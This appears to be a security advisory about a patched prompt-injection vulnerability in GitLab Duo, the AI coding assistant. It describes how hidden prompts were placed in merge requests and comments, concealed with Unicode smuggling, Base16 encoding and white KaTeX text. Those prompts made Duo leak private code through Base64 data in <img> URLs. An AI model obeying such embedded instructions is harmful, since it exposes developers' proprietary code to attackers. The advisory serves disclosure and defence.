Multiple Trend Micro Products Vulnerabilities
May 24, 2025NJRAT – Active IOCs
May 26, 2025Multiple Trend Micro Products Vulnerabilities
May 24, 2025NJRAT – Active IOCs
May 26, 2025Severity
Medium
Analysis Summary
A critical remote prompt injection vulnerability was discovered in GitLab Duo, the AI-powered coding assistant integrated into GitLab’s DevSecOps platform, and publicly disclosed in February 2025. This flaw allowed attackers to manipulate Duo into leaking private source code and injecting untrusted HTML content into responses, potentially redirecting users to malicious websites. GitLab has since patched the issue, but the incident underscores the growing security concerns related to embedding large language model (LLM)-based assistants into sensitive development environments.
According to the Researcher, the exploit capitalized on Duo’s context-aware architecture, which parses entire project contents, including source code, comments, descriptions, and commit messages, to offer coding suggestions. Attackers leveraged this behavior by embedding hidden prompts in various parts of the project, such as merge request descriptions and issue comments. These instructions were obscured using sophisticated encoding techniques, including Unicode smuggling, Base16 encoding, and white text rendered with KaTeX, making them virtually invisible to human reviewers. The malicious payloads exploited multiple vulnerabilities identified in the 2025 OWASP Top 10 for LLMs, including LLM01 (Prompt Injection), LLM02 (Sensitive Information Disclosure), and LLM05 (Improper Output Handling), enabling manipulation of Duo’s output and undermining project integrity.
One of the most alarming aspects was the HTML injection vulnerability introduced by Duo’s real-time response rendering system. Since the AI assistant streams markdown responses into HTML before completing full parsing and sanitization, a timing gap emerged, allowing attackers to inject executable HTML elements. Although GitLab utilized DOMPurify for sanitization, it failed to block certain tags like <img>, <form>, and <a>. Researchers exploited this by embedding Base64-encoded private source code inside an <img> tag’s URL. When rendered, browsers automatically sent GET requests to attacker-controlled domains, exfiltrating sensitive data, including proprietary iOS source code and zero-day vulnerabilities, without the user’s awareness.
GitLab acknowledged the findings and, following responsible disclosure on February 12, 2025, released patch duo-ui!52, which prevents Duo from rendering unsafe HTML tags linking to external domains. This action effectively closed the exfiltration vector. However, the incident serves as a powerful warning: AI coding assistants are now part of the modern attack surface. As security researcher emphasized, any system that allows LLMs to process user-controlled input must assume all content is potentially malicious. The GitLab Duo case highlights the need for strong input validation, strict output sanitization, and isolation mechanisms to ensure LLMs do not become conduits for sensitive data exposure or supply chain compromise.
Impact
- Sensitive information Theft
- Gain Access
Remediation
- Patched the vulnerability through update duo-ui!52, which blocks unsafe HTML tags that point to external domains (outside gitlab.com).
- Improved HTML sanitization by strengthening the use of DOMPurify to better filter out risky tags like <img>, <form>, and <a>.
- Limited Duo’s ability to process user-controlled content in a way that prevents hidden prompt injection from descriptions, comments, or commit messages.
- Block streaming-based HTML rendering flaws to reduce the chances of executing malicious content before proper sanitization.
- Prevent restricted external data requests from being triggered by embedded Base64 payloads inside rendered content.
- Acknowledged the issue publicly and followed responsible disclosure practices to ensure transparency and a fast response.
- Reviewed AI assistant behavior to make sure it doesn’t leak sensitive data by blindly trusting context from project files.